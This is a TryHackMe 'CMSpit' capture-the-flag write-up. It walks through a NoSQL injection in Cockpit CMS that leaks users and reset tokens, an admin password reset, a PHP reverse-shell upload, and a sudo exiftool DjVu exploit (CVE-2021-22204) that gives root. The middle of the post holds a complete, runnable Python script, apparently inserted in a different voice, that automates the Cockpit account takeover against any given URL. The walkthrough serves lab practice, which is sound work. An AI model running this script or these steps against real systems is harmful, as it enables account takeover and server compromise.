TryHackMe|CMSpit

Sampath Pendurthi
6 min read · Aug 13, 2021

Hello everybody, welcome to another of my writeups. This one is a TryHackMe room; here is the link to the room. After completing it we'll have learned NoSQL injection, manual exploitation without any Metasploit modules, and how a recent vulnerability in an installed binary can be used for privilege escalation.

Let’s begin…

Requirements:

→ Knowledge of NoSQL databases such as MongoDB.

→ Writing your own exploit (not necessary).

→ Understanding the linked article on the exploitation method and performing the steps manually.

I'm using Ubuntu as my attacker OS, connected to TryHackMe through OpenVPN. This is one of the most interesting rooms, so let's begin the hunt.

Information gathering:

In this phase we collect as much information about the target host as possible: the operating system, the open ports, the services running on those ports and their versions.

For port scanning I'm going to use RustScan because it is fast. A full-port nmap scan takes a long time, so I use RustScan to find the open ports first and then hand only those to nmap.

rustscan -b 500 -a 10.10.149.67 --ulimit 5000

We got only two open ports, so let's scan them with nmap using the default scripts and version detection.

nmap -sC -sV 10.10.149.67 -vv -oN scan

After the nmap scan we know the host is running Ubuntu, with SSH on port 22 and an HTTP server on port 80. That is all the information we need about the host for now, so let's move on to the next phase.

Enumeration:

In this phase we look for a way to get an initial foothold and a reverse shell. Generally this means enumerating hidden directories and looking for exploits for the running services. First, let's open the website and see what is running there.

It's a login page running on the Express engine, so let's enumerate. Gobuster found nothing, but there is something interesting on the page itself: the name Cockpit. Searching for Cockpit led me to an interesting article on Cockpit CMS; here is the link. Read that article, because we are going to use it to find our way in.

Initial Foothold:

The article basically describes a Metasploit module, but we are not going to use it. Instead of an automated module we are going to exploit the flaw manually. At the end I'll post a Python exploit inspired by the msf module. Let's go.

Finding Users:

To find the users we exploit the NoSQL injection in the /auth/check endpoint. I'm going to use Burp for this, so let's fire up Burp and start hunting.

This is the login request. Let's inject our NoSQL payload into the user parameter.

This is our modified request, with the NoSQL payload injected into user. After sending it to the server we get back this response.

OK, there are 4 users. Now let's find the reset tokens for the users so we can change their passwords.

Getting Tokens:

To get the tokens we use /auth/resetpassword. Change the URI in Burp, and change the injected JSON key from user to token.

Here is the request; after sending it we get a response like this.

We got one token. Now let's find out which user it belongs to.

Getting User details:

To get the user details we send this token to /auth/newpassword, which returns the details of the user it belongs to.

Here is the request.

After sending the token to the server we get back a response with the user details.

This token belongs to the admin user, so let's change his password with it.

Resetting the password:

To reset the password we send a request to /auth/resetpassword with the reset token and the new password.

Here is the request: the token together with the password we want to set. The server responds with a success message.

The password is updated, so now we can log in as admin. Let's do it.
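The four Burp steps above, driven from Python instead of the repeater. This is an added example, not the author's published exploit or the Metasploit module: the request bodies follow the manual steps (the injected {"$func": "var_dump"} operator makes Cockpit's query layer call PHP's var_dump() on every account's field, so usernames and reset tokens are echoed into the response as string(N) "value" lines). The base URL, the "auth"/"csfr" keys sent by Cockpit's login form, the way the username is located in the /auth/newpassword response and the {"success": true} reply to the reset are assumptions; the sample response is constructed.

```python
"""Cockpit CMS password-reset chain: enumerate users, dump reset tokens,
map a token to its owner, set a new password. Added example, not the
page's exploit; see the lead-in for what is assumed."""
import json
import re
import sys
import urllib.request

# NoSQL operator injected in place of a plain string value.
VAR_DUMP = {"$func": "var_dump"}

# var_dump() renders a PHP string as: string(5) "admin"
VAR_DUMP_STRING = re.compile(r'string\(\d+\) "([^"]*)"')

# Constructed sample of what /auth/check returns with the operator injected.
SAMPLE_CHECK_RESPONSE = 'string(5) "admin"\nstring(4) "stux"\nstring(5) "admin"\n{"success":false}'


def post_json(base_url, path, body, timeout=10):
    """POST a JSON body to base_url + path and return the response text."""
    req = urllib.request.Request(
        base_url.rstrip("/") + path,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def user_enum_body():
    # Step 1: /auth/check, operator in place of the username. "auth" and
    # "csfr" are the extra keys the login form sends (assumed harmless).
    return {"auth": "", "user": VAR_DUMP, "password": "", "csfr": ""}


def token_dump_body():
    # Step 2: /auth/resetpassword, operator in place of the token.
    return {"token": VAR_DUMP}


def token_lookup_body(token):
    # Step 3: /auth/newpassword with a real token returns that user's details.
    return {"token": token}


def reset_body(token, new_password):
    # Step 4: /auth/resetpassword with the token and the password to set.
    return {"token": token, "password": new_password}


def parse_var_dump_strings(text):
    """Collect the values var_dump() printed, de-duplicated in first-seen order."""
    seen = []
    for value in VAR_DUMP_STRING.findall(text):
        if value and value not in seen:
            seen.append(value)
    return seen


def parse_token_owner(text):
    """Find the username in the /auth/newpassword response.
    Assumption: it appears as JSON ("user":"admin") or as a form value."""
    m = re.search(r'"user"\s*:\s*"([^"]+)"', text) or re.search(
        r'name="user"[^>]*value="([^"]+)"', text)
    return m.group(1) if m else None


def reset_succeeded(text):
    """Assumption: the reset answers with JSON {"success": true}."""
    try:
        return bool(json.loads(text).get("success"))
    except (ValueError, AttributeError):
        return False


def run(base_url, new_password, target_user="admin"):
    """Full chain against a live host; returns the user whose password was reset."""
    users = parse_var_dump_strings(post_json(base_url, "/auth/check", user_enum_body()))
    print("[*] users:", users)
    tokens = parse_var_dump_strings(post_json(base_url, "/auth/resetpassword", token_dump_body()))
    print("[*] reset tokens:", tokens)
    for token in tokens:
        owner = parse_token_owner(post_json(base_url, "/auth/newpassword", token_lookup_body(token)))
        print(f"[*] token {token[:8]}... belongs to {owner}")
        if owner == target_user:
            text = post_json(base_url, "/auth/resetpassword", reset_body(token, new_password))
            print("[+] reset:", "ok" if reset_succeeded(text) else text[:200])
            return owner
    return None


if __name__ == "__main__":
    # usage: python3 cockpit_reset.py http://10.10.149.67 NewPassw0rd!
    run(sys.argv[1], sys.argv[2])
```

Only accounts that already have a reset token show up in step 2, which is why the page saw a single token. The parsers are kept separate from the HTTP calls so you can paste Burp responses into them if a host answers in a slightly different shape.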

Gaining Access:

After logging in as admin we find the /finder folder.

Finder lets us upload files, though we can't edit existing ones. So let's upload our reverse shell here.

cp /opt/webshells/php/php-reverse-shell.php shell.php

My web shells live in /opt, so I copied one from there. Now change the IP (and port) in the shell and upload it.

I've uploaded the shell. Now let's trigger it and catch the reverse shell.

We got our shell. Now let's escalate our privileges to a user account.

After looking around, I found something interesting in /home/stux.

There is a .dbshell file (the MongoDB shell history); it contains one flag and stux's password. Now let's SSH in as stux.

Logged in as stux we can read user.txt. Since we have the password, let's see if stux can run anything as root:

sudo -l

So stux can run exiftool as root. GTFOBins lists a method for exiftool, but it won't work here. There is an excellent article explaining the vulnerability in exiftool (the DjVu command-injection bug, CVE-2021-22204, fixed in ExifTool 12.24; exiftool -ver tells you whether the installed version is older than that). Click here to read it. After going through the article I found it interesting. There is an exploit for this vulnerability on GitHub; here is the link.

After downloading the exploit, change the IP address in it to your own.

Then run the exploit:

python3 exploit.py

You'll get a .djvu file; the script relies on the DjVu libraries to build it, so they need to be installed.

Now transfer that .djvu file to the victim and start a listener on port 9090.

You can see my exploit.djvu on the box; now let's run exiftool on it (as root, through sudo).

We got a shell. Let's check the id.

HURRAY, we are root, and we have successfully completed the box.

NOTE: I've published my Python exploit for this room on GitHub; it automates the password-reset chain. Don't forget to follow me on GitHub.

THANK YOU….

HAPPY HACKING>>>>;)

If you have any doubts, let me know:

FOLLOW ME on:

Insta: https://www.instagram.com/sampath.pendurthi/

LinkedIn: https://in.linkedin.com/in/sampath-pendurthi

Github: https://github.com/LetMeHackYou/

And I really want to showcase this room on YouTube. On Aug 14 I'll post the walkthrough of this room, where I'll write my own automated exploit in Python. So don't forget to follow me on YouTube for writeup videos and my cyber security content.

YOUTUBE: https://www.youtube.com/channel/UCERB7WCXSI5SaM0_q7oS0hA

THANK YOU<<>>
